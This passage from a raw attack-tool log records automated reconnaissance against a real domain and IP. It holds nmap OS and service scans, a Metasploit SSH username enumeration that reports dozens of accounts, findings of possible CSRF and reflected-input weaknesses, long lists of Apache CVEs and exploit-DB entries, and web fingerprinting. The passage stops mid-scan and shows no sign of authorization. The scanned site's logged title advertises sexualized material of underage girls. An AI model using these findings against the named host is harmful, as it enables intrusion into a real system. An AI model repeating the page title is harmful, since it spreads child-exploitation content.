2724Aggressive OS guesses: Linux 3.0 - 3.1 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
2725No exact OS matches for host (test conditions non-ideal).
2726Network Distance: 14 hops
2727Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2728
2729TRACEROUTE (using port 22/tcp)
2730HOP RTT ADDRESS
27311 47.91 ms 10.246.204.1
27322 48.81 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
27333 32.87 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
27344 31.06 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
27355 36.29 ms te0-7-0-2.rcr21.ymq02.atlas.cogentco.com (38.122.42.161)
27366 53.31 ms be2089.ccr21.ymq01.atlas.cogentco.com (154.54.45.113)
27377 112.01 ms be3043.ccr22.lpl01.atlas.cogentco.com (154.54.44.165)
27388 129.50 ms be2183.ccr42.ams03.atlas.cogentco.com (154.54.58.70)
27399 129.52 ms be3457.ccr21.ams04.atlas.cogentco.com (130.117.1.10)
274010 129.53 ms worldstream.demarc.cogentco.com (149.11.39.42)
274111 129.53 ms 109.236.95.181
274212 129.55 ms 190.2.158.155
274313 129.56 ms 185.106.120.66
274414 112.04 ms latina.petite.guru (185.82.200.52)
2745#######################################################################################################################################
2746USER_FILE => /usr/share/brutex/wordlists/simple-users.txt
2747RHOSTS => www.ygmt.info
2748RHOST => www.ygmt.info
2749[*] 185.82.200.52:22 - SSH - Using malformed packet technique
2750[*] 185.82.200.52:22 - SSH - Starting scan
2751[+] 185.82.200.52:22 - SSH - User 'admin' found
2752[+] 185.82.200.52:22 - SSH - User 'administrator' found
2753[+] 185.82.200.52:22 - SSH - User 'anonymous' found
2754[+] 185.82.200.52:22 - SSH - User 'backup' found
2755[+] 185.82.200.52:22 - SSH - User 'bee' found
2756[+] 185.82.200.52:22 - SSH - User 'ftp' found
2757[+] 185.82.200.52:22 - SSH - User 'guest' found
2758[+] 185.82.200.52:22 - SSH - User 'GUEST' found
2759[+] 185.82.200.52:22 - SSH - User 'info' found
2760[+] 185.82.200.52:22 - SSH - User 'mail' found
2761[+] 185.82.200.52:22 - SSH - User 'mailadmin' found
2762[+] 185.82.200.52:22 - SSH - User 'msfadmin' found
2763[+] 185.82.200.52:22 - SSH - User 'mysql' found
2764[+] 185.82.200.52:22 - SSH - User 'nobody' found
2765[+] 185.82.200.52:22 - SSH - User 'oracle' found
2766[+] 185.82.200.52:22 - SSH - User 'owaspbwa' found
2767[+] 185.82.200.52:22 - SSH - User 'postfix' found
2768[+] 185.82.200.52:22 - SSH - User 'postgres' found
2769[+] 185.82.200.52:22 - SSH - User 'private' found
2770[+] 185.82.200.52:22 - SSH - User 'proftpd' found
2771[+] 185.82.200.52:22 - SSH - User 'public' found
2772[+] 185.82.200.52:22 - SSH - User 'root' found
2773[+] 185.82.200.52:22 - SSH - User 'superadmin' found
2774[+] 185.82.200.52:22 - SSH - User 'support' found
2775[+] 185.82.200.52:22 - SSH - User 'sys' found
2776[+] 185.82.200.52:22 - SSH - User 'system' found
2777[+] 185.82.200.52:22 - SSH - User 'systemadmin' found
2778[+] 185.82.200.52:22 - SSH - User 'systemadministrator' found
2779[+] 185.82.200.52:22 - SSH - User 'test' found
2780[+] 185.82.200.52:22 - SSH - User 'tomcat' found
2781[+] 185.82.200.52:22 - SSH - User 'user' found
2782[+] 185.82.200.52:22 - SSH - User 'webmaster' found
2783[+] 185.82.200.52:22 - SSH - User 'www-data' found
2784[+] 185.82.200.52:22 - SSH - User 'Fortimanager_Access' found
2785[*] Scanned 1 of 1 hosts (100% complete)
2786[*] Auxiliary module execution completed
2787#######################################################################################################################################
2788Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:24 EDT
2789NSE: Loaded 164 scripts for scanning.
2790NSE: Script Pre-scanning.
2791Initiating NSE at 00:24
2792Completed NSE at 00:24, 0.00s elapsed
2793Initiating NSE at 00:24
2794Completed NSE at 00:24, 0.00s elapsed
2795Initiating Parallel DNS resolution of 1 host. at 00:24
2796Completed Parallel DNS resolution of 1 host. at 00:24, 0.02s elapsed
2797Initiating SYN Stealth Scan at 00:24
2798Scanning www.ygmt.info (185.82.200.52) [1 port]
2799Discovered open port 80/tcp on 185.82.200.52
2800Completed SYN Stealth Scan at 00:24, 0.16s elapsed (1 total ports)
2801Initiating Service scan at 00:24
2802Scanning 1 service on www.ygmt.info (185.82.200.52)
2803Completed Service scan at 00:24, 6.25s elapsed (1 service on 1 host)
2804Initiating OS detection (try #1) against www.ygmt.info (185.82.200.52)
2805Retrying OS detection (try #2) against www.ygmt.info (185.82.200.52)
2806Initiating Traceroute at 00:24
2807Completed Traceroute at 00:24, 0.19s elapsed
2808Initiating Parallel DNS resolution of 14 hosts. at 00:24
2809Completed Parallel DNS resolution of 14 hosts. at 00:24, 0.25s elapsed
2810NSE: Script scanning 185.82.200.52.
2811Initiating NSE at 00:24
2812Completed NSE at 00:25, 53.89s elapsed
2813Initiating NSE at 00:25
2814Completed NSE at 00:25, 0.56s elapsed
2815Nmap scan report for www.ygmt.info (185.82.200.52)
2816Host is up (0.11s latency).
2817rDNS record for 185.82.200.52: latina.petite.guru
2818
2819PORT STATE SERVICE VERSION
282080/tcp open http Apache httpd 2.4.10 ((Debian))
2821| http-auth-finder:
2822| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.ygmt.info
2823| url method
2824|_ http://www.ygmt.info:80/top50/index.php?a=user_cpl FORM
2825| http-brute:
2826|_ Path "/" does not require authentication
2827|_http-chrono: Request times for /; avg: 516.71ms; min: 448.62ms; max: 638.55ms
2828| http-csrf:
2829| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=www.ygmt.info
2830| Found the following possible CSRF vulnerabilities:
2831|
2832| Path: http://www.ygmt.info:80/top50/index.php
2833| Form id:
2834| Form action: index.php
2835|
2836| Path: http://www.ygmt.info:80/top50/index.php
2837| Form id:
2838| Form action: index.php
2839|
2840| Path: http://www.ygmt.info:80/top50/index.php?a=user_cpl
2841| Form id:
2842| Form action: index.php
2843|
2844| Path: http://www.ygmt.info:80/top50/index.php?a=user_cpl
2845| Form id:
2846| Form action: index.php
2847|
2848| Path: http://www.ygmt.info:80/top50/index.php?a=user_cpl
2849| Form id:
2850| Form action: http://www.ygmt.info/top50/index.php?a=user_cpl
2851|
2852| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=9
2853| Form id:
2854| Form action: index.php
2855|
2856| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=9
2857| Form id:
2858| Form action: index.php
2859|
2860| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Nonude+Sites&start=1
2861| Form id:
2862| Form action: index.php
2863|
2864| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Nonude+Sites&start=1
2865| Form id:
2866| Form action: index.php
2867|
2868| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=33
2869| Form id:
2870| Form action: index.php
2871|
2872| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=33
2873| Form id:
2874| Form action: index.php
2875|
2876| Path: http://www.ygmt.info:80/top50/index.php?cat=Nonude+Sites
2877| Form id:
2878| Form action: index.php
2879|
2880| Path: http://www.ygmt.info:80/top50/index.php?cat=Nonude+Sites
2881| Form id:
2882| Form action: index.php
2883|
2884| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=76
2885| Form id:
2886| Form action: index.php
2887|
2888| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=76
2889| Form id:
2890| Form action: index.php
2891|
2892| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Free+Sites&start=1
2893| Form id:
2894| Form action: index.php
2895|
2896| Path: http://www.ygmt.info:80/top50/index.php?method=in&cat=Free+Sites&start=1
2897| Form id:
2898| Form action: index.php
2899|
2900| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=62
2901| Form id:
2902| Form action: index.php
2903|
2904| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=62
2905| Form id:
2906| Form action: index.php
2907|
2908| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=39
2909| Form id:
2910| Form action: index.php
2911|
2912| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=39
2913| Form id:
2914| Form action: index.php
2915|
2916| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=15
2917| Form id:
2918| Form action: index.php
2919|
2920| Path: http://www.ygmt.info:80/top50/index.php?a=stats&u=15
2921| Form id:
2922|_ Form action: index.php
2923|_http-date: Sun, 06 Oct 2019 04:24:48 GMT; -4s from local time.
2924|_http-devframework: Couldn't determine the underlying framework or CMS. Try increasing 'httpspider.maxpagecount' value to spider more pages.
2925|_http-dombased-xss: Couldn't find any DOM based XSS.
2926|_http-drupal-enum: Nothing found amongst the top 100 resources,use --script-args number=<number|all> for deeper analysis)
2927| http-errors:
2928| Spidering limited to: maxpagecount=40; withinhost=www.ygmt.info
2929| Found the following error pages:
2930|
2931| Error Code: 400
2932| http://www.ygmt.info:80
2933|
2934| Error Code: 404
2935| http://www.ygmt.info:80/url;
2936|
2937| Error Code: 404
2938| http://www.ygmt.info:80/android-app:/
2939|
2940| Error Code: 404
2941|_ http://www.ygmt.info:80/top50/index.php?a=join
2942| http-feed:
2943| Spidering limited to: maxpagecount=40; withinhost=www.ygmt.info
2944| Found the following feeds:
2945|_ RSS (version 2.0): http://www.ygmt.info:80/top50/feed.php
2946|_http-fetch: Please enter the complete path of the directory to save data in.
2947| http-headers:
2948| Date: Sun, 06 Oct 2019 04:24:47 GMT
2949| Server: Apache/2.4.10 (Debian)
2950| Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
2951| ETag: "a0d-583eebde65fc0"
2952| Accept-Ranges: bytes
2953| Content-Length: 2573
2954| Vary: Accept-Encoding
2955| Connection: close
2956| Content-Type: text/html
2957|
2958|_ (Request type: HEAD)
2959|_http-jsonp-detection: Couldn't find any JSONP endpoints.
2960|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
2961| http-methods:
2962|_ Supported Methods: GET HEAD POST OPTIONS
2963|_http-mobileversion-checker: No mobile version detected.
2964| http-php-version: Logo query returned unknown hash ee8cc4afcc21c18aee24a4fe866484d4
2965|_Credits query returned unknown hash ee8cc4afcc21c18aee24a4fe866484d4
2966|_http-security-headers:
2967|_http-server-header: Apache/2.4.10 (Debian)
2968| http-sitemap-generator:
2969| Directory structure:
2970| /
2971| Other: 1
2972| /banner/
2973| gif: 1
2974| /bn/
2975| png: 1
2976| /top50/
2977| php: 1
2978| /top50/css/
2979| css: 1
2980| /top50/js/
2981| js: 1
2982| Longest directory structure:
2983| Depth: 2
2984| Dir: /top50/css/
2985| Total files found (by extension):
2986|_ Other: 1; css: 1; gif: 1; js: 1; php: 1; png: 1
2987|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
2988|_http-title: Books, videos, photos, fiction and non-fiction of and about yo...
2989| http-unsafe-output-escaping:
2990| Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?method=in&cat=Nonude+Sites&start=1
2991| Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?cat=Nonude+Sites
2992|_ Characters [> " '] reflected in parameter cat at http://www.ygmt.info:80/top50/index.php?method=in&cat=Free+Sites&start=1
2993| http-vhosts:
2994|_127 names had status 200
2995|_http-wordpress-enum: Nothing found amongst the top 100 resources,use --script-args search-limit=<number|all> for deeper analysis)
2996|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
2997|_http-xssed: No previously reported XSS vuln.
2998| vulners:
2999| cpe:/a:apache:http_server:2.4.10:
3000| CVE-2017-7679 7.5 https://vulners.com/cve/CVE-2017-7679
3001| CVE-2017-7668 7.5 https://vulners.com/cve/CVE-2017-7668
3002| CVE-2017-3169 7.5 https://vulners.com/cve/CVE-2017-3169
3003| CVE-2017-3167 7.5 https://vulners.com/cve/CVE-2017-3167
3004| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
3005| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
3006| CVE-2017-9788 6.4 https://vulners.com/cve/CVE-2017-9788
3007| CVE-2019-10098 5.8 https://vulners.com/cve/CVE-2019-10098
3008| CVE-2019-0220 5.0 https://vulners.com/cve/CVE-2019-0220
3009| CVE-2018-17199 5.0 https://vulners.com/cve/CVE-2018-17199
3010| CVE-2017-9798 5.0 https://vulners.com/cve/CVE-2017-9798
3011| CVE-2017-15710 5.0 https://vulners.com/cve/CVE-2017-15710
3012| CVE-2016-8743 5.0 https://vulners.com/cve/CVE-2016-8743
3013| CVE-2016-2161 5.0 https://vulners.com/cve/CVE-2016-2161
3014| CVE-2016-0736 5.0 https://vulners.com/cve/CVE-2016-0736
3015| CVE-2014-3583 5.0 https://vulners.com/cve/CVE-2014-3583
3016| CVE-2019-10092 4.3 https://vulners.com/cve/CVE-2019-10092
3017| CVE-2016-4975 4.3 https://vulners.com/cve/CVE-2016-4975
3018| CVE-2015-3185 4.3 https://vulners.com/cve/CVE-2015-3185
3019| CVE-2014-8109 4.3 https://vulners.com/cve/CVE-2014-8109
3020| CVE-2018-1283 3.5 https://vulners.com/cve/CVE-2018-1283
3021|_ CVE-2016-8612 3.3 https://vulners.com/cve/CVE-2016-8612
3022| vulscan: VulDB - https://vuldb.com:
3023| [68575] Apache HTTP Server up to 2.4.10 LuaAuthzProvider mod_lua.c privilege escalation
3024| [68435] Apache HTTP Server 2.4.10 mod_proxy_fcgi.c handle_headers denial of service
3025| [88747] Apache HTTP Server 2.4.17/2.4.18 mod_http2 denial of service
3026| [76731] Apache HTTP Server 2.4.12 ErrorDocument 400 Crash denial of service
3027| [74367] Apache HTTP Server up to 2.4.12 mod_lua lua_request.c wsupgrade denial of service
3028| [13300] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi setuid privilege escalation
3029| [13299] Apache HTTP Server 2.4.1/2.4.2 mod_wsgi Content-Type Header information disclosure
3030|
3031| MITRE CVE - https://cve.mitre.org:
3032| [CVE-2013-2249] mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors.
3033| [CVE-2012-4558] Multiple cross-site scripting (XSS) vulnerabilities in the balancer_handler function in the manager interface in mod_proxy_balancer.c in the mod_proxy_balancer module in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via a crafted string.
3034| [CVE-2012-3502] The proxy functionality in (1) mod_proxy_ajp.c in the mod_proxy_ajp module and (2) mod_proxy_http.c in the mod_proxy_http module in the Apache HTTP Server 2.4.x before 2.4.3 does not properly determine the situations that require closing a back-end connection, which allows remote attackers to obtain sensitive information in opportunistic circumstances by reading a response that was intended for a different client.
3035| [CVE-2012-3499] Multiple cross-site scripting (XSS) vulnerabilities in the Apache HTTP Server 2.2.x before 2.2.24-dev and 2.4.x before 2.4.4 allow remote attackers to inject arbitrary web script or HTML via vectors involving hostnames and URIs in the (1) mod_imagemap, (2) mod_info, (3) mod_ldap, (4) mod_proxy_ftp, and (5) mod_status modules.
3036| [CVE-2012-3451] Apache CXF before 2.4.9, 2.5.x before 2.5.5, and 2.6.x before 2.6.2 allows remote attackers to execute unintended web-service operations by sending a header with a SOAP Action String that is inconsistent with the message body.
3037| [CVE-2012-2687] Multiple cross-site scripting (XSS) vulnerabilities in the make_variant_list function in mod_negotiation.c in the mod_negotiation module in the Apache HTTP Server 2.4.x before 2.4.3, when the MultiViews option is enabled, allow remote attackers to inject arbitrary web script or HTML via a crafted filename that is not properly handled during construction of a variant list.
3038| [CVE-2012-2379] Apache CXF 2.4.x before 2.4.8, 2.5.x before 2.5.4, and 2.6.x before 2.6.1, when a Supporting Token specifies a child WS-SecurityPolicy 1.1 or 1.2 policy, does not properly ensure that an XML element is signed or encrypted, which has unspecified impact and attack vectors.
3039| [CVE-2012-2378] Apache CXF 2.4.5 through 2.4.7, 2.5.1 through 2.5.3, and 2.6.x before 2.6.1, does not properly enforce child policies of a WS-SecurityPolicy 1.1 SupportingToken policy on the client side, which allows remote attackers to bypass the (1) AlgorithmSuite, (2) SignedParts, (3) SignedElements, (4) EncryptedParts, and (5) EncryptedElements policies.
3040| [CVE-2012-0883] envvars (aka envvars-std) in the Apache HTTP Server before 2.4.2 places a zero-length directory name in the LD_LIBRARY_PATH, which allows local users to gain privileges via a Trojan horse DSO in the current working directory during execution of apachectl.
3041| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
3042|
3043| SecurityFocus - https://www.securityfocus.com/bid/:
3044| [42102] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
3045| [27237] Apache HTTP Server 2.2.6, 2.0.61 and 1.3.39 'mod_status' Cross-Site Scripting Vulnerability
3046| [15413] PHP Apache 2 Virtual() Safe_Mode and Open_Basedir Restriction Bypass Vulnerability
3047| [15177] PHP Apache 2 Local Denial of Service Vulnerability
3048| [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability
3049| [5816] Apache 2 mod_dav Denial Of Service Vulnerability
3050| [5486] Apache 2.0 CGI Path Disclosure Vulnerability
3051| [5485] Apache 2.0 Path Disclosure Vulnerability
3052| [5434] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
3053| [5256] Apache httpd 2.0 CGI Error Path Disclosure Vulnerability
3054| [4057] Apache 2 for Windows OPTIONS request Path Disclosure Vulnerability
3055| [4056] Apache 2 for Windows php.exe Path Disclosure Vulnerability
3056|
3057| IBM X-Force - https://exchange.xforce.ibmcloud.com:
3058| [75211] Debian GNU/Linux apache 2 cross-site scripting
3059|
3060| Exploit-DB - https://www.exploit-db.com:
3061| [31052] Apache <= 2.2.6 'mod_negotiation' HTML Injection and HTTP Response Splitting Vulnerability
3062| [30901] Apache HTTP Server 2.2.6 Windows Share PHP File Extension Mapping Information Disclosure Vulnerability
3063| [30835] Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness
3064| [28424] Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness
3065| [28365] Apache 2.2.2 CGI Script Source Code Information Disclosure Vulnerability
3066| [27915] Apache James 2.2 SMTP Denial of Service Vulnerability
3067| [27135] Apache Struts 2 DefaultActionMapper Prefixes OGNL Code Execution
3068| [26710] Apache CXF prior to 2.5.10, 2.6.7 and 2.7.4 - Denial of Service
3069| [24590] Apache 2.0.x mod_ssl Remote Denial of Service Vulnerability
3070| [23581] Apache 2.0.4x mod_perl Module File Descriptor Leakage Vulnerability
3071| [23482] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (2)
3072| [23481] Apache 2.0.4x mod_php Module File Descriptor Leakage Vulnerability (1)
3073| [23296] Red Hat Apache 2.0.40 Directory Index Default Configuration Error
3074| [23282] apache cocoon 2.14/2.2 - Directory Traversal vulnerability
3075| [22191] Apache Web Server 2.0.x MS-DOS Device Name Denial of Service Vulnerability
3076| [21854] Apache 2.0.39/40 Oversized STDERR Buffer Denial of Service Vulnerability
3077| [21719] Apache 2.0 Path Disclosure Vulnerability
3078| [21697] Apache 2.0 Encoded Backslash Directory Traversal Vulnerability
3079| [20272] Apache 1.2.5/1.3.1,UnityMail 2.0 MIME Header DoS Vulnerability
3080| [19828] Cobalt RaQ 2.0/3.0 Apache .htaccess Disclosure Vulnerability
3081| [18984] Apache Struts <= 2.2.1.1 - Remote Command Execution
3082| [18329] Apache Struts2 <= 2.3.1 - Multiple Vulnerabilities
3083| [17691] Apache Struts < 2.2.0 - Remote Command Execution
3084| [15319] Apache 2.2 (Windows) Local Denial of Service
3085| [14617] Apache JackRabbit 2.0.0 webapp XPath Injection
3086| [11650] Apache 2.2.14 mod_isapi Dangling Pointer Remote SYSTEM Exploit
3087| [8458] Apache Geronimo <= 2.1.3 - Multiple Directory Traversal Vulnerabilities
3088| [5330] Apache 2.0 mod_jk2 2.0.2 - Remote Buffer Overflow Exploit (win32)
3089| [3996] Apache 2.0.58 mod_rewrite Remote Overflow Exploit (win2k3)
3090| [2237] Apache < 1.3.37, 2.0.59, 2.2.3 (mod_rewrite) Remote Overflow PoC
3091| [1056] Apache <= 2.0.49 Arbitrary Long HTTP Headers Denial of Service
3092| [855] Apache <= 2.0.52 HTTP GET request Denial of Service Exploit
3093| [132] Apache 1.3.x - 2.0.48 - mod_userdir Remote Users Disclosure Exploit
3094| [38] Apache <= 2.0.45 APR Remote Exploit -Apache-Knacker.pl
3095| [34] Webfroot Shoutbox < 2.32 (Apache) Remote Exploit
3096| [11] Apache <= 2.0.44 Linux Remote Denial of Service Exploit
3097| [9] Apache HTTP Server 2.x Memory Leak Exploit
3098|
3099| OpenVAS (Nessus) - http://www.openvas.org:
3100| [855524] Solaris Update for Apache 2 120544-14
3101| [855077] Solaris Update for Apache 2 120543-14
3102| [100858] Apache 'mod_proxy_http' 2.2.9 for Unix Timeout Handling Information Disclosure Vulnerability
3103| [72626] Debian Security Advisory DSA 2579-1 (apache2)
3104| [71551] Gentoo Security Advisory GLSA 201206-25 (apache)
3105| [71550] Gentoo Security Advisory GLSA 201206-24 (apache tomcat)
3106| [71485] Debian Security Advisory DSA 2506-1 (libapache-mod-security)
3107| [71256] Debian Security Advisory DSA 2452-1 (apache2)
3108| [71238] Debian Security Advisory DSA 2436-1 (libapache2-mod-fcgid)
3109| [70724] Debian Security Advisory DSA 2405-1 (apache2)
3110| [70235] Debian Security Advisory DSA 2298-2 (apache2)
3111| [70233] Debian Security Advisory DSA 2298-1 (apache2)
3112| [69988] Debian Security Advisory DSA 2279-1 (libapache2-mod-authnz-external)
3113| [69338] Debian Security Advisory DSA 2202-1 (apache2)
3114| [65131] SLES9: Security update for Apache 2 oes/CORE
3115| [64426] Gentoo Security Advisory GLSA 200907-04 (apache)
3116| [61381] Gentoo Security Advisory GLSA 200807-06 (apache)
3117| [60582] Gentoo Security Advisory GLSA 200803-19 (apache)
3118| [58745] Gentoo Security Advisory GLSA 200711-06 (apache)
3119| [57851] Gentoo Security Advisory GLSA 200608-01 (apache)
3120| [56246] Gentoo Security Advisory GLSA 200602-03 (Apache)
3121| [55392] Gentoo Security Advisory GLSA 200509-12 (Apache)
3122| [55129] Gentoo Security Advisory GLSA 200508-15 (apache)
3123| [54739] Gentoo Security Advisory GLSA 200411-18 (apache)
3124| [54724] Gentoo Security Advisory GLSA 200411-03 (apache)
3125| [54712] Gentoo Security Advisory GLSA 200410-21 (apache)
3126| [54689] Gentoo Security Advisory GLSA 200409-33 (net=www/apache)
3127| [54677] Gentoo Security Advisory GLSA 200409-21 (apache)
3128| [54610] Gentoo Security Advisory GLSA 200407-03 (Apache)
3129| [54601] Gentoo Security Advisory GLSA 200406-16 (Apache)
3130| [54590] Gentoo Security Advisory GLSA 200406-05 (Apache)
3131| [54582] Gentoo Security Advisory GLSA 200405-22 (Apache)
3132| [54529] Gentoo Security Advisory GLSA 200403-04 (Apache)
3133| [54499] Gentoo Security Advisory GLSA 200310-04 (Apache)
3134| [54498] Gentoo Security Advisory GLSA 200310-03 (Apache)
3135| [11092] Apache 2.0.39 Win32 directory traversal
3136| [66081] SLES11: Security update for Apache 2
3137| [66074] SLES10: Security update for Apache 2
3138| [66070] SLES9: Security update for Apache 2
3139| [65893] SLES10: Security update for Apache 2
3140| [65888] SLES10: Security update for Apache 2
3141| [65510] SLES9: Security update for Apache 2
3142| [65249] SLES9: Security update for Apache 2
3143| [65230] SLES9: Security update for Apache 2
3144| [65228] SLES9: Security update for Apache 2
3145| [65207] SLES9: Security update for Apache 2
3146| [65136] SLES9: Security update for Apache 2
3147| [65017] SLES9: Security update for Apache 2
3148|
3149| SecurityTracker - https://www.securitytracker.com:
3150| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
3151| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
3152| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
3153| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
3154| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
3155|
3156| OSVDB - http://www.osvdb.org:
3157| [20897] PHP w/ Apache 2 SAPI virtual() Function Unspecified INI Setting Disclosure
3158|_
3159Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3160Device type: general purpose|broadband router|WAP|webcam
3161Running (JUST GUESSING): Linux 3.X|2.6.X|2.4.X (95%), Asus embedded (94%), AXIS embedded (94%)
3162OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/h:asus:rt-ac66u cpe:/h:asus:rt-n10 cpe:/h:axis:211_network_camera cpe:/o:linux:linux_kernel:2.6.20 cpe:/o:linux:linux_kernel:2.4 cpe:/o:linux:linux_kernel:3.8
3163Aggressive OS guesses: Linux 3.0 - 3.1 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.9 (95%), Asus RT-AC66U router (Linux 2.6) (94%), Asus RT-N10 router or AXIS 211A Network Camera (Linux 2.6) (94%), Linux 2.6.18 (94%), Asus RT-N16 WAP (Linux 2.6) (94%), Asus RT-N66U WAP (Linux 2.6) (94%), Tomato 1.28 (Linux 2.6.22) (94%), AXIS 211A Network Camera (Linux 2.6.20) (94%)
3164No exact OS matches for host (test conditions non-ideal).
3165Uptime guess: 30.015 days (since Fri Sep 6 00:04:25 2019)
3166Network Distance: 14 hops
3167TCP Sequence Prediction: Difficulty=262 (Good luck!)
3168IP ID Sequence Generation: All zeros
3169
3170TRACEROUTE (using port 80/tcp)
3171HOP RTT ADDRESS
31721 41.17 ms 10.246.204.1
31732 61.02 ms vlan102.as02.qc1.ca.m247.com (176.113.74.17)
31743 81.23 ms irb-0.agg1.qc1.ca.m247.com (37.120.128.168)
31754 38.88 ms te-1-5-2-0.bb1.fra2.de.m247.com (82.102.29.44)
31765 99.88 ms te0-0-0-3.rcr21.ymq02.atlas.cogentco.com (38.104.155.233)
31776 99.92 ms be2090.ccr22.ymq01.atlas.cogentco.com (154.54.45.117)
31787 120.60 ms be3042.ccr21.lpl01.atlas.cogentco.com (154.54.44.161)
31798 120.63 ms be2183.ccr42.ams03.atlas.cogentco.com (154.54.58.70)
31809 120.64 ms be3458.ccr21.ams04.atlas.cogentco.com (154.54.39.186)
318110 139.89 ms worldstream.demarc.cogentco.com (149.14.93.74)
318211 139.89 ms 109.236.95.183
318312 139.88 ms 190.2.158.155
318413 139.89 ms 185.106.120.66
318514 120.63 ms latina.petite.guru (185.82.200.52)
3186
3187NSE: Script Post-scanning.
3188Initiating NSE at 00:25
3189Completed NSE at 00:25, 0.00s elapsed
3190Initiating NSE at 00:25
3191Completed NSE at 00:25, 0.00s elapsed
3192######################################################################################################################################
3193http://www.ygmt.info [200 OK] Apache[2.4.10], HTTPServer[Debian Linux][Apache/2.4.10 (Debian)], IP[185.82.200.52], Script[JavaScript], Title[Books, videos, photos, fiction and non-fiction of and about young girls under 16 preteen models], X-UA-Compatible[IE=edge]
3194######################################################################################################################################
3195
3196wig - WebApp Information Gatherer
3197
3198
3199Scanning http://www.ygmt.info...
3200________________________ SITE INFO ________________________
3201IP Title
3202185.82.200.52 Books, videos, photos, fiction and non-fic
3203
3204_________________________ VERSION _________________________
3205Name Versions Type
3206Apache 2.4.10 Platform
3207Debian 8.0 | 8.0 (pre-release) OS
3208
3209___________________________________________________________
3210Time: 1.7 sec Urls: 809 Fingerprints: 40401
3211######################################################################################################################################
3212HTTP/1.1 200 OK
3213Date: Sun, 06 Oct 2019 04:25:43 GMT
3214Server: Apache/2.4.10 (Debian)
3215Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
3216ETag: "a0d-583eebde65fc0"
3217Accept-Ranges: bytes
3218Content-Length: 2573
3219Vary: Accept-Encoding
3220Content-Type: text/html
3221
3222HTTP/1.1 200 OK
3223Date: Sun, 06 Oct 2019 04:25:43 GMT
3224Server: Apache/2.4.10 (Debian)
3225Last-Modified: Wed, 13 Mar 2019 00:18:15 GMT
3226ETag: "a0d-583eebde65fc0"
3227Accept-Ranges: bytes
3228Content-Length: 2573
3229Vary: Accept-Encoding
3230Content-Type: text/html
3231
3232Allow: GET,HEAD,POST,OPTIONS
3233######################################################################################################################################
3234Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-06 00:25 EDT
3235NSE: Loaded 164 scripts for scanning.
3236NSE: Script Pre-scanning.
3237Initiating NSE at 00:25
3238Completed NSE at 00:25, 0.00s elapsed
3239Initiating NSE at 00:25
3240Completed NSE at 00:25, 0.00s elapsed
3241Initiating Parallel DNS resolution of 1 host. at 00:25
3242Completed Parallel DNS resolution of 1 host. at 00:25, 0.02s elapsed
3243Initiating SYN Stealth Scan at 00:25
3244Scanning www.ygmt.info (185.82.200.52) [1 port]
3245Discovered open port 443/tcp on 185.82.200.52
3246Completed SYN Stealth Scan at 00:25, 0.16s elapsed (1 total ports)
3247Initiating Service scan at 00:25
